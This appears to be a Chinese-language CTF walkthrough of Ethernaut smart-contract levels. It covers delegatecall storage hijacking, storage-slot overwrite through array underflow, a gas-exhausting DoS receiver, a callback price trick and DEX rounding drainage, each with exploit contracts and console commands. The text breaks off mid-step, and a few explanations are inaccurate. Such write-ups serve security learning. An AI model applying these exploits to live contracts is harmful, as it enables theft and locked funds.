<td>spender 代为转出</td>
</tr>
</tbody></table>
<pre><code class="language-python">await contract.approve(player, await contract.balanceOf(player))
await contract.transferFrom(player, &quot;0xb5D90200E89F7e3AC01cA1A6A2E34987C55E4049&quot;, await contract.balanceOf(player))
//看余额
(await contract.balanceOf(player) / 1e18).toString()
</code></pre>
<h1>preservation 代理攻击</h1><p>本合同使用一个库来存储两个不同时区的两个不同时间。构造函数为每个要存储的时间创建该库的两个实例。</p>
<p>目标拿下合同所有权</p>
<pre><code class="language-solidity">// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

contract Preservation {
  // public library contracts
  address public timeZone1Library;
  address public timeZone2Library;
  address public owner;
  uint256 storedTime;
  // Sets the function signature for delegatecall
  bytes4 constant setTimeSignature = bytes4(keccak256(&quot;setTime(uint256)&quot;));

  constructor(address _timeZone1LibraryAddress, address _timeZone2LibraryAddress) {
    timeZone1Library = _timeZone1LibraryAddress;
    timeZone2Library = _timeZone2LibraryAddress;
    owner = msg.sender;
  }

  // set the time for timezone 1
  function setFirstTime(uint256 _timeStamp) public {
    timeZone1Library.delegatecall(abi.encodePacked(setTimeSignature, _timeStamp));
  }

  // set the time for timezone 2
  function setSecondTime(uint256 _timeStamp) public {
    timeZone2Library.delegatecall(abi.encodePacked(setTimeSignature, _timeStamp));
  }
}

// Simple library contract to set the time
contract LibraryContract {
  // stores a timestamp
  uint256 storedTime;

  function setTime(uint256 _time) public {
    storedTime = _time;
  }
}
</code></pre>
<p>合约中用到了delegatecall()函数，一般情况下delegatecall用来调用其他合约、库的函数，比如** a 合约中调用 b 合约的函数，但执行该函数使用的 storage是a的**</p>
<p>调用setFirstTime函数时候实际通过delegatecall 执行了LibraryContract的setTime函数，修改了slot 1，也就是修改了timeZone1Library变量。这样，我们第一次调用setFirstTime将timeZone1Library变量修改为我们的恶意合约的地址，第二次调用setFirstTime就可以执行我们的任意代码了。</p>
<pre><code class="language-solidity">// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

contract attack{
    address public timeZone1Library;
    address public timeZone2Library;//占位的，让owner属于slot[2]
    address public owner;

    function setTime(uint256 _time) public {
        owner = 0xdE3d99ec73f3ce95f0634424245Ed68B01eBd2A2;
        _time=_time;//单纯为了不报警告，美观
    }

}
</code></pre>
<pre><code class="language-solidity">await contract.address
&#39;0xAF92c31A3d1176C36C6aDAf9a5c99a2da9d2f1Df&#39;

await web3.eth.getStorageAt(&quot;0xAF92c31A3d1176C36C6aDAf9a5c99a2da9d2f1Df&quot;, 0)
&#39;0x000000000000000000000000f88ed7d1dfcd1bb89a975662fd7cb536058f3a30&#39;

await contract.setFirstTime(&#39;0xA2Fc9C8292c932153509a494434499D94Fd9fBA9&#39;)
{tx: &#39;0x5174bbbf97632aeef7c9e032bb1adbd7d9d8c0413c4369b6577db61b704983dd&#39;, receipt: {…}, logs: Array(0)}

//地址改为恶意合约的
await web3.eth.getStorageAt(&quot;0xAF92c31A3d1176C36C6aDAf9a5c99a2da9d2f1Df&quot;, 0)
&#39;0x000000000000000000000000a2fc9c8292c932153509a494434499d94fd9fba9&#39;

await contract.setFirstTime(&#39;1&#39;)//触发owner改变
{tx: &#39;0x5be6601ba4cd0cdf86616d5e5fcb90965e4ed050ded7017e679ee83b27647313&#39;, receipt: {…}, logs: Array(0)}

await contract.owner()
&#39;0xdE3d99ec73f3ce95f0634424245Ed68B01eBd2A2&#39;
</code></pre>
<h1>recovery</h1><p>一位合约创建者构建了一个非常简单的代币工厂合约。任何人都能轻松创建新代币。部署第一个代币合约后，创建者发送了0.001以太币以获取更多代币。此后，他们丢失了该合约地址。</p>
<p>从丢失的合约地址中找回（或移除）<code>0.001</code>以太币，此关卡即告完成。</p>
<pre><code class="language-solidity">// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

contract Recovery {
    //generate tokens
    function generateToken(string memory _name, uint256 _initialSupply) public {
        new SimpleToken(_name, msg.sender, _initialSupply);
    }
}

contract SimpleToken {
    string public name;
    mapping(address =&gt; uint256) public balances;

    // constructor
    constructor(string memory _name, address _creator, uint256 _initialSupply) {
        name = _name;
        balances[_creator] = _initialSupply;
    }

    // collect ether in return for tokens
    receive() external payable {
        balances[msg.sender] = msg.value * 10;
    }

    // allow transfers of tokens
    function transfer(address _to, uint256 _amount) public {
        require(balances[msg.sender] &gt;= _amount);
        balances[msg.sender] = balances[msg.sender] - _amount;
        balances[_to] = _amount;
    }

    // clean up after ourselves
    function destroy(address payable _to) public {
        selfdestruct(_to);
    }
}
</code></pre>
<ul>
<li>调用 <code>generateToken</code> 就会 <code>new SimpleToken(...)</code>，部署一个新的 SimpleToken。 </li>
<li><strong>注意</strong>：部署后并没有把这个新合约地址保存／返回给调用者。也就是说，部署者“丢失”了这个地址。</li>
</ul>
<p>区块链上一切都是透明的，即使弄丢了 Token 地址，也可以从区块中根据交易记录找回。</p>
<p>我们直接用小狐狸去区块链浏览器查找本题的交易，找到新合约地址，直接调用自毁函数向我们账户转账</p>
<p><img src="/__published_media/external/%E5%9B%BE%E5%BA%93/2672cb4912fd7f038fe0272d47d53df9_MD5.png" alt=""></p>
<p>remix写调用接口脚本，部署时用at address选项写入找到的地址，调用接口</p>
<pre><code class="language-solidity">// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;
interface ISimpleToken {
    function destroy(address payable _to) external;
}
</code></pre>
<p><img src="/__published_media/external/%E5%9B%BE%E5%BA%93/5a800fb50fdfead773e38ad2e0f9682f_MD5.png" alt=""></p>
<h1><strong>MagicNumber 字节码shellcode</strong></h1><p>要解决此关卡，你只需向Ethernaut提供一个<code>Solver</code>，这是一个能够以正确的32字节数字响应<code>whatIsTheMeaningOfLife()</code>的合约。</p>
<p>Easy right? Well... there&#39;s a catch.很简单，对吧？不过……这里有个陷阱。</p>
<p>The solver&#39;s code needs to be really tiny. Really reaaaaaallly tiny. Like freakin&#39; really really itty-bitty tiny: 10 bytes at most.求解器的代码必须非常精简。真的非常非常精简。简直是小得离谱的那种精简：最多10字节。</p>
<p>Hint: Perhaps its time to leave the comfort of the Solidity compiler momentarily, and build this one by hand O_o. That&#39;s right: Raw EVM bytecode.提示：或许是时候暂时离开Solidity编译器的舒适区，手动构建这个了，哦？没错：就是原始的EVM字节码。</p>
<p>Good luck! 祝你好运！</p>
<pre><code class="language-solidity">// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

contract MagicNum {
    address public solver;

    constructor() {}

    function setSolver(address _solver) public {
        solver = _solver;
    }

    /*
    ____________/\\\_______/\\\\\\\\\_____        
     __________/\\\\\_____/\\\///////\\\___       
      ________/\\\/\\\____\///______\//\\\__      
       ______/\\\/\/\\\______________/\\\/___     
        ____/\\\/__\/\\\___________/\\\//_____    
         __/\\\\\\\\\\\\\\\\_____/\\\//________   
          _\///////////\\\//____/\\\/___________  
           ___________\/\\\_____/\\\\\\\\\\\\\\\_ 
            ___________\///_____\///////////////__
    */
}
</code></pre>
<p>题目致敬一部电影，要求返回值为42，即2a</p>
<p>shellcode:<code>60 2a  60 00  52 60  20 60  00 f3</code><br>对应的 opcodes：<br><code>PUSH1 0x2a</code> | <code>PUSH1 0x00</code> | <code>MSTORE</code> | <code>PUSH1 0x20</code> | <code>PUSH1 0x00</code> | <code>RETURN</code></p>
<p>目标：当合约被调用时，返回 ABI 格式的 <code>uint256</code>，值为 <code>42</code>（十六进制 <code>0x2a</code>），占用 32 字节（右对齐，左补 0）。</p>
<p>指令 1：<code>60 2a</code> → <code>PUSH1 0x2a</code></p>
<ul>
<li>PC 从 0 → 2</li>
<li>操作：把字节 <code>0x2a</code> 压入栈顶（作为 1-byte immediate，但在栈上视为 256-bit 值）</li>
<li>Stack 变为：<code>[0x2a]</code> （栈顶在左）</li>
<li>说明：栈上的值是 0x...002a（逻辑上是 256-bit）</li>
</ul>
<p>指令 2：<code>60 00</code> → <code>PUSH1 0x00</code></p>
<ul>
<li>PC 从 2 → 4</li>
<li>操作：把字节 <code>0x00</code> 压入栈顶（将作为 memory 偏移）</li>
<li>Stack 变为：<code>[0x00, 0x2a]</code> （栈顶左：0x00）</li>
<li>说明：栈顶现在是 offset（0），次顶是 value（42）。</li>
</ul>
<p>指令 3：<code>52</code> → <code>MSTORE</code></p>
<ul>
<li>PC 从 4 → 5</li>
<li>操作：弹出两个栈项：<code>offset = pop()</code>（最先弹出的，即 0x00），<code>value = pop()</code>（0x2a）。然后把 <code>value</code>（作为 32 字节 big-endian）写入 memory，从 <code>offset</code> 开始，写入 32 字节。</li>
<li>栈变为：<code>[]</code>（空）</li>
<li>Memory 变化（写入 32 bytes at offset 0）：<ul>
<li>memory[0..31] = <code>0x0000...00002a</code>（31 个 0 字节，然后最后一字节是 0x2a）</li>
</ul>
</li>
<li>更直观（以 32 字节 hex 表示）：</li>
</ul>
<pre><code class="language-plain">memory[0:32] = 0x000000000000000000000000000000000000000000000000000000000000002a
</code></pre>
<ul>
<li>说明：<code>MSTORE</code> 总是写整整 32 字节；当 value 比 32 字节短（这里只有 1 字节 <code>0x2a</code>），高位用 0 填充（big-endian）。</li>
</ul>
<p>指令 4：<code>60 20</code> → <code>PUSH1 0x20</code></p>
<ul>
<li>PC 5 → 7</li>
<li>操作：压入 <code>0x20</code>（十进制 32），表示返回长度（bytes）</li>
<li>Stack：<code>[0x20]</code></li>
</ul>
<p>指令 5：<code>60 00</code> → <code>PUSH1 0x00</code></p>
<ul>
<li>PC 7 → 9</li>
<li>操作：压入 <code>0x00</code>（返回偏移）</li>
<li>Stack：<code>[0x00, 0x20]</code>（栈顶为返回偏移）</li>
</ul>
<p>指令 6：<code>f3</code> → <code>RETURN</code></p>
<ul>
<li>PC 9 → end</li>
<li>操作：弹出两个值：<code>offset = pop()</code>（0x00），<code>size = pop()</code>（0x20），然后将 memory[offset : offset+size] 发回给调用者并结束执行。</li>
<li>这里就是返回 <code>memory[0:32]</code>，也就是 <code>0x...002a</code>。</li>
<li>最终返回值（32 bytes）：</li>
</ul>
<pre><code class="language-plain">0x000000000000000000000000000000000000000000000000000000000000002a
</code></pre>
<ul>
<li>这完全符合 Ethereum ABI 对 <code>uint256</code> 的返回：32 字节、右对齐、左侧补 0。</li>
</ul>
<hr>
<p>为什么必须返回 32 字节？</p>
<p>EVM 的 <code>RETURN</code> 指令是原始的内存返回机制：它按你给的 <code>offset</code> 和 <code>size</code> 返回任意字节数。<strong>Solidity ABI</strong>（以及大多数高层调用者）期望 <code>uint256</code> 类型在返回时是 32 字节对齐的（高位补零）。为了兼容外部调用（关卡合约会用 <code>uint256</code> 比较），我们返回完整 32 字节是稳妥且正确的做法。题目也通常会用 <code>uint256</code> 类型，所以返回 32 字节是自然选择。</p>
<p>（理论上你可以用 <code>RETURN</code> 返回更少的字节，只要调用方如何解析那段数据也匹配，但对应 Ethernaut 的检查，它会把返回值解释为 <code>uint256</code> 并进行比较，所以必须是 32 字节格式化的 42。）</p>
<pre><code class="language-solidity">var bytecode = &quot;0x600a600c600039600a6000f3602A60805260206080f3&quot;;
web3.eth.sendTransaction({ from: player, data: bytecode }, function(err,res){console.log(res)});
await contract.setSolver(&quot;contract address&quot;);
钱包进区块链浏览器看新合约地址
</code></pre>
<table>
<thead>
<tr>
<th>部分</th>
<th>含义</th>
</tr>
</thead>
<tbody><tr>
<td><code>web3.eth.sendTransaction(...)</code></td>
<td>调用 Web3 的 API，向区块链发送一笔交易。</td>
</tr>
<tr>
<td><code>{ from: player, data: bytecode }</code></td>
<td>交易内容： - <code>from: player</code><br/> 表示发送者地址（通常是你当前登录的钱包地址）。 - <code>data: bytecode</code><br/> 表示交易里包含的 EVM 字节码，而不是普通的 ETH 转账金额。<strong>没有 <strong><code>**to**</code><br/></strong> 字段时</strong>，EVM 会把它当作“创建合约”的交易。</td>
</tr>
<tr>
<td><code>function(err, res){ console.log(res) }</code></td>
<td>回调函数：交易发出后打印结果（一般是 <strong>交易哈希 txHash</strong>）。 - <code>err</code><br/> 如果发送失败（比如 gas 不够），会在这里显示错误； - <code>res</code><br/> 通常是返回的交易哈希字符串。</td>
</tr>
</tbody></table>
<h1><strong>Alien Codex  动态数组在storage存放位置</strong></h1><p>认领所有权</p>
<pre><code class="language-solidity">// SPDX-License-Identifier: MIT
pragma solidity ^0.5.0;

import &quot;../helpers/Ownable-05.sol&quot;;

contract AlienCodex is Ownable {
    bool public contact;
    bytes32[] public codex;

    modifier contacted() {
        assert(contact);
        _;
    }

    function makeContact() public {
        contact = true;
    }

    function record(bytes32 _content) public contacted {
        codex.push(_content);
    }

    function retract() public contacted {
        codex.length--;
    }

    function revise(uint256 i, bytes32 _content) public contacted {
        codex[i] = _content;
    }
}
</code></pre>
<p>在 slot [0]中同时存储了contact和owner，需要做的就是将owner变量覆盖为自己，OOB (out of boundary) Attack首先通过调用 retract()，使得 codex 数组长度下溢。</p>
<p>以下N代表变量的slot所在位置</p>
<table>
<thead>
<tr>
<th>类型</th>
<th>存储位置计算方式</th>
</tr>
</thead>
<tbody><tr>
<td>普通变量 <code>x</code></td>
<td>slot N</td>
</tr>
<tr>
<td>定长数组 <code>arr[i]</code></td>
<td>slot = N + i</td>
</tr>
<tr>
<td>动态数组 <code>arr[i]</code></td>
<td>slot = keccak256(N) + i</td>
</tr>
<tr>
<td>mapping <code>map[key]</code></td>
<td>slot = keccak256(abi.encode(key, N))</td>
</tr>
</tbody></table>
<p>于本题</p>
<table>
<thead>
<tr>
<th>slot</th>
<th>内容</th>
</tr>
</thead>
<tbody><tr>
<td>0</td>
<td>owner +bool contact</td>
</tr>
<tr>
<td>1</td>
<td>codex 数组长度（动态数组）</td>
</tr>
<tr>
<td>keccak256(1)</td>
<td>codex[0]</td>
</tr>
<tr>
<td>keccak256(1)+1</td>
<td>codex[1]</td>
</tr>
</tbody></table>
<p> 内存绕回类比  ,要找到slot[0]在动态数组下标要满足</p>
<pre><code class="language-solidity">找到某个 i，使得：
keccak256(1) + i == 0 （mod 2^256）    （在 uint256 下取模 2^256）
那么
i=-arrayBase(mod 2^256) =(2^256 - arrayBase)
</code></pre>
<pre><code class="language-solidity">// 相当于计算 keccak256(slot 1)
let array_base = web3.utils.soliditySha3({ t: &#39;uint256&#39;, v: 1 });
// array_base 是 codex[0] 所在的 storage slot

//let target_idx = (2^256 - arrayBase)
let arrayBase = BigInt(array_base); // array_base 是 &quot;0x...&quot; 字符串
let maxUint = (1n &lt;&lt; 256n) - 1n; // 2^256 - 1
let targetIdx = maxUint - arrayBase + 1n;

//targetIdx
//35707666377435648211887908874984608119992236509074197713628505308453184860938n
//await contract.revise(35707666377435648211887908874984608119992236509074197713628505308453184860938n,&#39;0x000000000000000000000001de3d99ec73f3ce95f0634424245ed68b01ebd2a2&#39;)
//{tx: &#39;0x04289f8d8dcb3fd329ec07fa60515053bbb39538f6be83bd09024e28d1328ea8&#39;, receipt: {…}, logs: Array(0)}
//await contract.owner()
//&#39;0xdE3d99ec73f3ce95f0634424245Ed68B01eBd2A2&#39;
</code></pre>
<h1>denial call的回调机制+dos</h1><p>这是一个简单的钱包，资金会随着时间推移逐步存入。您可以通过成为提现partner来逐步提取资金。</p>
<p>如果当所有者调用时，你能阻止他们提取资金<code>withdraw()</code> （当合约中还有资金，且交易金额为 100 万 gas 或更少时），你就能赢得这一关。</p>
<pre><code class="language-solidity">// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

contract Denial {
    address public partner; // withdrawal partner - pay the gas, split the withdraw
    address public constant owner = address(0xA9E);
    uint256 timeLastWithdrawn;
    mapping(address =&gt; uint256) withdrawPartnerBalances; // keep track of partners balances

    function setWithdrawPartner(address _partner) public {
        partner = _partner;
    }

    // withdraw 1% to recipient and 1% to owner
    function withdraw() public {
        uint256 amountToSend = address(this).balance / 100;
        // perform a call without checking return
        // The recipient can revert, the owner will still get their share
        partner.call{value: amountToSend}(&quot;&quot;);
        payable(owner).transfer(amountToSend);
        // keep track of last withdrawal time
        timeLastWithdrawn = block.timestamp;
        withdrawPartnerBalances[partner] += amountToSend;
    }

    // allow deposit of funds
    receive() external payable {}

    // convenience function
    function contractBalance() public view returns (uint256) {
        return address(this).balance;
    }
}
</code></pre>
<h2 id="section-2">什么是回调机制？</h2><p>Solidity 中的“回调机制”指的是：</p>
<p>当一个合约被 <strong>发送 ETH 或被 call 但没有匹配函数</strong> 时，EVM 会<strong>自动跳到某个特殊函数执行</strong> —— 这个函数就叫回调函数（fallback/receive）。</p>
<p>它是<strong>被动触发</strong>的，不是显式调用的。</p>
<h2 id="section-3">Solidity 中的回调函数有两种</h2><h2 id="section-4">① <code>receive()</code></h2><p>在下面场景触发：</p>
<ul>
<li>外部 <strong>只是发送 ETH</strong>（不带 data）</li>
<li>使用 <code>send</code>, <code>transfer</code>, 或 <code>call{value: X}(&quot;&quot;)</code></li>
</ul>
<p>示例：</p>
<pre><code class="language-plain">receive() external payable {
    // 自动触发：收到 ETH 时执行
}
</code></pre>
<hr>
<h2 id="section-5">② <code>fallback(bytes calldata)</code></h2><p>在下面场景触发：</p>
<ul>
<li>调用一个不存在的函数</li>
<li>调用有 data 但没有匹配 selector</li>
<li>发送 ETH，但没有 receive() 函数时</li>
</ul>
<p>示例：</p>
<pre><code class="language-plain">fallback() external payable {
    // 收到未知调用或带 data 的 ETH 时执行
}
</code></pre>
<h2 id="section-6">exp</h2><h3 id="section-7">错误的思路</h3><p>想到利用回调机制构建recive\fallback恶意重入，进行不断取钱</p>
<p>你之所以会觉得“重入=可以无限取钱”，是因为你拿 <strong>Reentrancy（重入）Bank 类漏洞</strong>的模式，套到了 <strong>Denial 关卡</strong>。<br>但 Denial 的 withdraw 完全不是 Bank 模式。</p>
<p>下面我用你最熟的 pwn/时序模型解释。</p>
<hr>
<p>🔥 先看 Denial 的 withdraw 源码（关键）</p>
<p>Denial（以太航员第 20 关）的 withdraw 大概这样（标准 Ethernaut 版）：</p>
<pre><code class="language-plain">function withdraw() public {
    uint amountToSend = address(this).balance / 100;
    partner.call{value: amountToSend}(&quot;&quot;);
    owner.transfer(amountToSend);
}
</code></pre>
<p>重要特征：</p>
<ol>
<li><strong>每次 withdraw 只发送 balance/100</strong></li>
<li><strong>balance 在每次 withdraw 中被减掉</strong></li>
<li>重大区别：<strong>不会修改任何用户余额，不存在“余额 = 未更新”问题</strong></li>
<li>不存在“重复扣余额”的漏洞入口</li>
</ol>
<hr>
<p>🚫 为什么不能像 Bank 那样重入无限提款？</p>
<p>我们用时序模拟一下重入：</p>
<h4>初始，例如合约里有 100 ETH</h4><ul>
<li>第一次 withdraw：<br>amount = 100/100 = 1 ETH<br>balance → 99 ETH</li>
<li>重入第二次 withdraw：<br>amount = 99/100 = 0.99 ETH（会向下取整，如 0）<br>balance → 98 ETH</li>
<li>重入第三次：<br>amount = 98/100 = 0.98 ETH</li>
</ul>
<p>你会发现：</p>
<ul>
<li>每次 amount 都<strong>减少</strong></li>
<li>越到后面越小，甚至变成 0</li>
<li>balance <strong>一直被更新</strong></li>
<li>永远不可能出现无限提取</li>
</ul>
<p>重入只是重复做：</p>
<p>余额除以 100 的小数部分取整 → 再扣掉它</p>
<p>根本不会出现“循环 100 次提走所有钱”的情况。</p>
<hr>
<h4>📉 一个非常关键的点：</h4><p><strong>因 Solidity 的整数除法向下取整，所以 amount 在余额小于 100 wei 时直接变成 0。</strong></p>
<p>那意味着：</p>
<ul>
<li>当余额 &lt; 100 wei 时，</li>
<li><code>balance / 100 = 0</code></li>
<li>调 victim.withdraw() 根本不会给你任何钱</li>
<li>你也无法继续消耗余额</li>
</ul>
<p>你最多能拿走“剩余余额的 1%”，没有利用价值。</p>
<h3 id="section-8">✅ 为什么在 Denial 必须保留 receive？</h3><p>Denial 合约的 withdraw() 逻辑（简化版）是：</p>
<pre><code class="language-plain">function withdraw() public {
    uint amount = address(this).balance / 100;
    withdrawPartner.call{value: amount}(&quot;&quot;);   // 关键点
    owner.transfer(amount);
}
</code></pre>
<p>核心是：</p>
<p>victim.withdraw() → partner.call → 调用你的 receive()</p>
<p>如果你把 receive 删除，那么 partner.call 时：</p>
<ul>
<li>victim 会尝试给你的合约发 ETH</li>
<li>你的合约 <strong>没有 receive() / fallback()</strong></li>
<li>那么交易直接 <strong>revert</strong></li>
<li>partner.call 返回 false，不会卡住，不会消耗 gas</li>
<li>withdraw() 会继续执行 owner.transfer → <strong>owner 仍然能拿到钱</strong></li>
<li>DoS 失败 ❌</li>
</ul>
<p>也就是说：</p>
<h3 id="section-9">✔️ 要想卡死 withdraw，必须让 partner.call 成功进入“回调”，然后在回调里卡死。</h3><p>如果你没有 receive/fallback，call 根本不会进入回调函数。</p>
<p>这就像 pwn 里：</p>
<p>你想利用回调路径，但你把 hook 函数删了 → 控制流根本不会到你的代码里 → 没法劫持程序。</p>
<hr>
<h3 id="section-10">✅ 那为什么你的 receive 里用 assert(false) 是 OK 的？</h3><p>因为：</p>
<ul>
<li>assert(false) 会触发 Panic(uint)</li>
<li>Panic 会消耗 <strong>所有剩余 gas</strong></li>
<li>导致 partner.call 彻底卡死，不返回</li>
</ul>
<p>于是：</p>
<ul>
<li>withdraw 第二步 <code>owner.transfer(amount)</code> 永远执行不到</li>
<li>owner 永远无法从合约取钱</li>
</ul>
<pre><code class="language-solidity">// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

interface IVictim {
    function setWithdrawPartner(address) external;
    function withdraw() external;
}

contract Attacker {
    IVictim public victim;
    constructor() {
        victim=IVictim(0x4A7Ccfdd2B29A0cFA1644aFa8e2ACBC8ce2e76d1);
        victim.setWithdrawPartner(address(this));
    }

    // 发起攻击
    function attack() external {
        victim.withdraw();
    }

    // 核心：卡死 partner.call
    receive() external payable {
        while (true) {}   // 或 assert(false);
    }
}
</code></pre>
<h1>shop</h1><pre><code class="language-solidity">// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

interface IBuyer {
  function price() external view returns (uint256);
}

contract Shop {
  uint256 public price = 100;
  bool public isSold;

  function buy() public {
    IBuyer _buyer = IBuyer(msg.sender);

    if (_buyer.price() &gt;= price &amp;&amp; !isSold) {
      isSold = true;
      price = _buyer.price();
    }
  }
}
</code></pre>
<p>IBuyer 就是一个<strong>回调接口（callback interface）</strong>，要求调用 Shop 的人（msg.sender）必须能实现一个：</p>
<pre><code class="language-plain">function price() external view returns (uint256);
</code></pre>
<p>Shop 调用者必须满足这个接口，不然无法作为 buyer。</p>
<p>Shop 调用 <code>price()</code> 两次，可以让这两个回调返回不同的值。  </p>
<pre><code class="language-solidity">// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

interface IShop {
    function isSold() external view returns (bool);
    function buy() external;
}

contract Hack {
    IShop public shop;

    constructor() {
        shop = IShop(0xFC852F497D986750D23BC063606C0A6e8ec059Ba);
    }

    function price() external view returns (uint256) {
        if (shop.isSold()) {
            return 1;
        }
        return 100;
    }

    function attack() external {
        shop.buy();
    }
}
</code></pre>
<h1>dex ERC20 evm无浮点数的利用向下取整</h1><p>你将初始获得10个<code>token1</code>和10个<code>token2</code>。去中心化交易所（DEX）合约初始拥有每种代币各100个。如果你能设法从合约中耗尽2个代币中至少1个的全部数量，并让合约报告资产的“不良”价格，你就能在这一关卡取得成功。</p>
<p>通常情况下，当你用ERC20代币进行兑换时，必须<code>approve</code>合约代表你花费你的代币。为了与游戏的语法保持一致，我们刚刚在合约本身中添加了<code>approve</code>方法。因此，你可以放心使用<code>contract.approve(contract.address, &lt;uint amount&gt;)</code>，而不必直接调用代币，它会自动按所需数量授权花费这两种代币。除此之外，你可以忽略<code>SwappableToken</code>合约。</p>
<pre><code class="language-solidity">// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

import &quot;openzeppelin-contracts-08/token/ERC20/IERC20.sol&quot;;
import &quot;openzeppelin-contracts-08/token/ERC20/ERC20.sol&quot;;
import &quot;openzeppelin-contracts-08/access/Ownable.sol&quot;;

contract Dex is Ownable {
    address public token1;
    address public token2;

    constructor() {}

    function setTokens(address _token1, address _token2) public onlyOwner {
        token1 = _token1;
        token2 = _token2;
    }

    function addLiquidity(address token_address, uint256 amount) public onlyOwner {
        IERC20(token_address).transferFrom(msg.sender, address(this), amount);
    }

    function swap(address from, address to, uint256 amount) public {
        require((from == token1 &amp;&amp; to == token2) || (from == token2 &amp;&amp; to == token1), &quot;Invalid tokens&quot;);
        require(IERC20(from).balanceOf(msg.sender) &gt;= amount, &quot;Not enough to swap&quot;);
        uint256 swapAmount = getSwapPrice(from, to, amount);
        IERC20(from).transferFrom(msg.sender, address(this), amount);
        IERC20(to).approve(address(this), swapAmount);
        IERC20(to).transferFrom(address(this), msg.sender, swapAmount);
    }

    function getSwapPrice(address from, address to, uint256 amount) public view returns (uint256) {
        return ((amount * IERC20(to).balanceOf(address(this))) / IERC20(from).balanceOf(address(this)));
    }

    function approve(address spender, uint256 amount) public {
        SwappableToken(token1).approve(msg.sender, spender, amount);
        SwappableToken(token2).approve(msg.sender, spender, amount);
    }

    function balanceOf(address token, address account) public view returns (uint256) {
        return IERC20(token).balanceOf(account);
    }
}

contract SwappableToken is ERC20 {
    address private _dex;

    constructor(address dexInstance, string memory name, string memory symbol, uint256 initialSupply)
        ERC20(name, symbol)
    {
        _mint(msg.sender, initialSupply);
        _dex = dexInstance;
    }

    function approve(address owner, address spender, uint256 amount) public {
        require(owner != _dex, &quot;InvalidApprover&quot;);
        super._approve(owner, spender, amount);
    }
}
</code></pre>
<p>基本信息</p>
<pre><code class="language-solidity">await contract.address
&#39;0x70E074615d19AFabc2164Ef9dBF7B65889BE5cEA&#39;

await contract.owner()
&#39;0xB468f8e42AC0fAe675B56bc6FDa9C0563B61A52F&#39;

await contract.token1()
&#39;0xcf8Fb69f4aB47E766852e1E7eb6Ff866dFA77253&#39;

await contract.token2()
&#39;0xb1Ff256Ff3F2dfD6FB4cd2E0074db081068EA027&#39;

控制台创建好变量,可以直接变量名查看地址
const token1addr = await contract.token1()
const token2addr = await contract.token2()

我们初始有各10代币
await contract.balanceOf(token1addr,player)
i {negative: 0, words: Array(2), length: 1, red: null}
(2) [10, 空白]

await contract.balanceOf(token2addr,player)
i {negative: 0, words: Array(2), length: 1, red: null}
(2) [10, 空白]
</code></pre>
<p>漏洞点如下，getSwapPrice函数计算方式</p>
<p> 要用 <code>amount</code> 个 <code>from</code> 代币来换多少 <code>to</code> 代币，但evm没有浮点数，所以小数点向下取整为0</p>
<pre><code class="language-solidity">    function swap(address from, address to, uint256 amount) public {
        require((from == token1 &amp;&amp; to == token2) || (from == token2 &amp;&amp; to == token1), &quot;Invalid tokens&quot;);
        require(IERC20(from).balanceOf(msg.sender) &gt;= amount, &quot;Not enough to swap&quot;);
        uint256 swapAmount = getSwapPrice(from, to, amount);
        IERC20(from).transferFrom(msg.sender, address(this), amount);
        IERC20(to).approve(address(this), swapAmount);
        IERC20(to).transferFrom(address(this), msg.sender, swapAmount);
    }

  function getSwapPrice(address from, address to, uint256 amount) public view returns (uint256) {
        return ((amount * IERC20(to).balanceOf(address(this))) / IERC20(from).balanceOf(address(this)));
    }

(amount * IERC20(to).balanceOf(address(this))) / IERC20(from).balanceOf(address(this))
</code></pre>
<h2 id="section-11">攻击思路（简述）</h2><p>我们会交替 swap：</p>
<ul>
<li>用 <strong>player 的全部 token1 换 token2</strong></li>
<li>再用 <strong>player 的全部 token2 换 token1</strong></li>
</ul>
<p>反复两次，DEX 的两个池子都会越来越小。</p>
<p>最终当某一边池子变到 1 时，我们只用少量输入就能换光另一边。</p>
<h2 id="section-12">✅ 第一步</h2><p>玩家使用全部 <strong>10 token1</strong> 换 token2：</p>
<pre><code class="language-plain">先授权
await contract.approve(contract.address,500)

await contract.swap(token1Addr, token2Addr, 10)
</code></pre>
<p>计算：</p>
<pre><code class="language-plain">swap = 10 * 100 / 100 = 10
</code></pre>
<p>执行后状态变为：</p>
<pre><code class="language-plain">DEX:
  token1 = 110
  token2 = 90

PLAYER:
  token1 = 0
  token2 = 20
</code></pre>
<hr>
<h2 id="section-13">✅ 第二步</h2><p>玩家用全部 <strong>20 token2</strong> 换 token1：</p>
<pre><code class="language-plain">await contract.swap(token2addr, token1addr, 20)
</code></pre>
<p>计算：</p>
<pre><code class="language-plain">swap = 20 * 110 / 90 = 24
</code></pre>
<p>执行后：</p>
<pre><code class="language-plain">DEX:
  token1 = 86
  token2 = 110

PLAYER:
  token1 = 24
  token2 = 0
</code></pre>
<hr>
<h2 id="section-14">✅ 第三步</h2><p>玩家用全部 <strong>24 token1</strong> 换 token2：</p>
<pre><code class="language-plain">await contract.swap(token1addr, token2addr, 24)
</code></pre>
<p>计算：</p>
<pre><code class="language-plain">swap = 24 * 110 / 86 = 30
</code></pre>
<p>执行后：</p>
<pre><code class="language-plain">DEX:
  token1 = 110
  token2 = 80

PLAYER:
  token1 = 0
  token2 = 30
</code></pre>
<hr>
<h2 id="section-15">✅ 第四步</h2><p>玩家再用全部 <strong>30 token2</strong> 换 token1：</p>
<pre><code class="language-plain">await contract.swap(token2addr, tokenaAddr, 30)
</code></pre>
<p>计算：</p>
<pre><code class="language-plain">swap = 30 * 110 / 80 = 41
</code></pre>
<p>执行后：</p>
<pre><code class="language-plain">DEX:
  token1 = 69
  token2 = 110

PLAYER:
  token1 = 41
  token2 = 0
</code></pre>
<hr>
<h2 id="section-16">⚠️ 注意：池子此时开始失衡</h2><p>从这里开始，只需要两三步就能完全 drain。</p>
<hr>
<h2 id="section-17">✅ 第五步</h2><p>用全部 <strong>41 token1</strong> 换 token2：</p>
<pre><code class="language-plain">await contract.swap(token1addr, token2addr, 41)
</code></pre>
<p>计算：</p>
<pre><code class="language-plain">swap = 41 * 110 / 69 ≈ 65
</code></pre>
<p>执行后：</p>
<pre><code class="language-plain">DEX:
  token1 = 110
  token2 = 45

PLAYER:
